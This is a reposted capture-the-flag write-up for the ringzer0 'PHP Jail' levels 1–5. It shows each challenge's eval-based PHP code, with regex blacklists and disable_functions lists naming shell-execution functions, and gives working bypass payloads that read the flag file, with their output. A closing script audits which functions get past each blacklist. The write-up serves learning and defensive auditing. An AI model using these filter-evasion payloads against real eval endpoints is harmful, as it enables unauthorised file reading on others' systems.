
ringzer0team CTF – Jail Escaping PHP

Posted 2017-09-16 11:10 by 汪洋大海

Here are my solutions for the ringzer0 Jail Escaping PHP challenges.
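https://ringzer0team.com/ is a very good online CTF challenge site (after you solve a challenge you can see other people's answers; note that you must finish the challenge before you can see them, although walkthroughs for most of this site's challenges are already public online). You can learn quite a few techniques there, and I recommend it. The article below is a repost. I don't want to restate this too many times: all articles in the 【汪洋大海】 column of this blog are reposts, and I will do my best to credit the source address; if I really cannot find it, there is nothing I can do.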

Level 1

RingZer0 Team Online CTF

PHP Jail Level 1:
Current user is uid=1000(level1) gid=1000(level1) groups=1000(level1)

Flag is located at /home/level1/flag.txt

Challenge PHP code:
-----------------------------
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(`|open|exec|pass|system|\$|\/)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

Solution:

Your input:
echo(file_get_contents('flag.txt'));
FLAG-sW66QEY4y6724723c7w1i0oMt179E75y

Level 2

PHP Jail Level 2
Current user is uid=1001(level2) gid=1001(level2) groups=1001(level2)

Flag is located at /home/level2/flag.txt

Challenge PHP code:
-----------------------------
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(\/|a|c|s|require|include|flag|eval|file)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

Since some functions (such as fread and file_get_contents) are not allowed, we can use popen to start an external command that reads flag.txt:

popen("vim", "w");

Once vim has started, we can read flag.txt by loading it into the buffer:

:r flag.txt

Flag: FLAG-YlxV8cCg84zvUtt595dla5un9EW57BCL

Level 3

RingZer0 Team Online CTF

PHP Jail Level 3:
Current user is uid=1002(level3) gid=1002(level3) groups=1002(level3)

Flag is located at /home/level3/flag.txt

Challenge PHP code:
-----------------------------
 
WARNING: the PHP interpreter is launched using php -c php.ini jail.php.
The php.ini file contain "disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,readfile,require,require_once,include,include_once,file"
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(`|\.|\$|\/|a|c|s|require|include)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------

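Since a lot of functions are disabled, one has to find an allowed function whose name does not contain any restricted characters. highlight_file is one of these functions:
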
Your input:
highlight_file(glob("fl*txt")[0]);
<code><span style="color: #000000">
FLAG-D6jg9230H05II3ri5QB7L9166gG73l8H<br /></span>
</code>Command executed

Level 4

RingZer0 Team Online CTF

PHP Jail Level 4:
Current user is uid=1003(level4) gid=1003(level4) groups=1003(level4)

Flag is located at /home/level4/flag.txt

Challenge PHP code:
-----------------------------

WARNING: the PHP interpreter is launched using php -c php.ini jail.php.
The php.ini file contains "disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,readfile,require,require_once,include,include_once,
 
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(\'|\"|`|\.|\$|\/|a|c|s|require|include)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

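As you can see, highlight_file is not disabled, so you could use something like:

highlight_file("flag.txt");

However, double quotes and the characters "a" and "." are not allowed. The next idea was to use glob:

highlight_file(glob("*")[4]);

But again: double quotes and the "*" character are not allowed. Since my solution is quite complicated, I'll try to explain my thinking:

a) I need the "/" character (also not allowed)
b) I need the "a" character
c) I need a way to define a string without using double quotes
d) I want to somehow build the string "/home/level4/flag.txt" from allowed characters and use it with glob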

现在解决每一个特定问题:

a) Using phpinfo(); I found that there are some environment variables that can be used to extract "/". Then I ran:

print_r(getenv(HOME));
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
/home/level4Command executed

I could then extract "/" by using:

getenv(HOME)[0];

b) PHP has some predefined constants like __FILE__, __DIR__, etc.:

print_r(__FILE__);
/home/level4/jail.php(14) : eval()'d codeCommand executed

Using __FILE__ I could extract "a" and ".".

c) Using define() and implode()/explode(), one can define constant strings and apply array operations to extract/concatenate characters:

define(HEY,__FILE__);print_r(explode(getenv(HOME)[0],HEY));
PHP Notice:  Use of undefined constant HEY - assumed 'HEY' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
Array
(
    [0] => 
    [1] => home
    [2] => level4
    [3] => jail.php(14) : eval()'d code
)

By using implode() you can concatenate several characters:

print_r(implode(getenv(HOME)[0],[getenv(HOME)[0],home,level4,file]));
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant home - assumed 'home' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant level4 - assumed 'level4' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant file - assumed 'file' in /home/level4/jail.php(14) : eval()'d code on line 1
//home/level4/fileCommand executed

d) Now if you put a), b) and c) together, you should be able to build your payload:

define(HEY, __FILE__); highlight_file(implode(getenv(HOME)[0],[getenv(HOME)[0],home,level4,getenv(HOME)[0],implode(explode(getenv(HOME)[0],HEY)[0], [fl,explode(getenv(HOME)[0],HEY)[3][1],g,explode(getenv(HOME)[0],HEY)[3][4],t,x,t])])); 
PHP Notice:  Use of undefined constant HEY - assumed 'HEY' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant home - assumed 'home' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant level4 - assumed 'level4' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant fl - assumed 'fl' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant g - assumed 'g' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant HOME - assumed 'HOME' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant t - assumed 't' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant x - assumed 'x' in /home/level4/jail.php(14) : eval()'d code on line 1
PHP Notice:  Use of undefined constant t - assumed 't' in /home/level4/jail.php(14) : eval()'d code on line 1
<code><span style="color: #000000">
FLAG-X9uF51b0X570f616897kLN3It3K6m63c<br /></span>
</code>Command executed

I know... very complicated (I have seen solutions that use hex2bin()), but it works :)

Level 5

RingZer0 Team Online CTF

PHP Jail Level 5:
Current user is uid=1004(level5) gid=1004(level5) groups=1004(level5)

Flag is located at /home/level5/flag.txt

Challenge PHP code:
-----------------------------

WARNING: the PHP interpreter is launched using php -c php.ini jail.php.
The php.ini file contains "disable_functions=exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,readfile,require,require_once,include,include_once,
 
<?php
array_shift($_SERVER['argv']);
$var = implode(" ", $_SERVER['argv']);
 
if($var == null) die("PHP Jail need an argument\n");
 
function filter($var) {
        if(preg_match('/(\_|\'|\"|`|\.|\$|\/|a|c|s|z|require|include)/i', $var)) {
                return false;
        }
        return true;
}
if(filter($var)) {
        eval($var);
        echo "Command executed";
} else {
        echo "Restricted characters has been used";
}
echo "\n";
?>
 
-----------------------------
Your input:

The first thing I did was to generate the file name (flag.txt):

Your input:
print(glob(hex2bin(hex2bin(3261)))[0]);
flag.txtCommand executed
Your input:

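Then I needed some function to read the contents of flag.txt. However, because of the additional character restrictions, I couldn't find any way to bypass them. Then I bought the hint:
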
md5 can return raw characters such as *, Some classes can help you error messages too

So I needed some class with a constructor that takes a file name as a parameter. As always: Google is your friend -> inurl:php.net/manual/en/class. Then I found Finfo:

Your input:
new Finfo(0,glob(hex2bin(hex2bin(3261)))[0]);
PHP Notice:  finfo::finfo(): Warning: offset `FLAG-81M2544kLM9nxBJCfMG2ET8329Lo1qqZ' invalid in /home/level5/jail.php(14) : eval()'d code on line 1
PHP Notice:  finfo::finfo(): Warning: type `FLAG-81M2544kLM9nxBJCfMG2ET8329Lo1qqZ' invalid in /home/level5/jail.php(14) : eval()'d code on line 1
PHP Warning:  finfo::finfo(): Failed to load magic database at '/home/level5/flag.txt'. in /home/level5/jail.php(14) : eval()'d code on line 1
Command executed
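
Every level above falls to a name the blacklist never lists, and that gap can be measured. The following PHP script is an added example, not part of the original write-up or the challenge code: it applies the five filter patterns and the disable_functions value quoted above to PHP's internal function table and reports what still gets through. It assumes the Level 3 disable_functions list also applies to Levels 4 and 5, where the page shows it truncated.

```php
<?php
// Added example: audits what each level's blacklist still leaves callable.
// Filter patterns and the disable_functions value are copied from the page.
$filters = [
    1 => '/(`|open|exec|pass|system|\$|\/)/i',
    2 => '/(\/|a|c|s|require|include|flag|eval|file)/i',
    3 => '/(`|\.|\$|\/|a|c|s|require|include)/i',
    4 => '/(\'|\"|`|\.|\$|\/|a|c|s|require|include)/i',
    5 => '/(\_|\'|\"|`|\.|\$|\/|a|c|s|z|require|include)/i',
];
// Assumption: the complete list shown for Level 3 is reused for Levels 4 and 5.
$disabled = explode(',', 'exec,passthru,shell_exec,system,proc_open,popen,'
    . 'curl_exec,curl_multi_exec,parse_ini_file,readfile,require,'
    . 'require_once,include,include_once,file');
// Levels 1 and 2 show no php.ini restriction on the page.
$disabledFrom = 3;

// Function and class names the write-up mentions, checked per level.
$named = ['file_get_contents', 'fread', 'popen', 'highlight_file', 'glob',
          'getenv', 'implode', 'explode', 'define', 'hex2bin', 'finfo'];

function survives(string $name, string $filter, array $disabled): bool
{
    // Callable only if the name passes the regex and is not disabled.
    return !preg_match($filter, $name)
        && !in_array(strtolower($name), $disabled, true);
}

$internal = get_defined_functions()['internal'];
foreach ($filters as $level => $filter) {
    $deny = $level >= $disabledFrom ? $disabled : [];
    $left = array_filter($internal, fn($f) => survives($f, $filter, $deny));
    $ok   = array_filter($named, fn($f) => survives($f, $filter, $deny));
    printf("Level %d: %d of %d internal functions pass; from the write-up: %s\n",
        $level, count($left), count($internal), implode(', ', $ok) ?: '(none)');
}
```

The counts depend on the PHP build and its loaded extensions, so run it with the same interpreter and php.ini as the code being reviewed.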

Source: http://blog.dornea.nu/2016/06/20/ringzer0-ctf-jail-escaping-php/
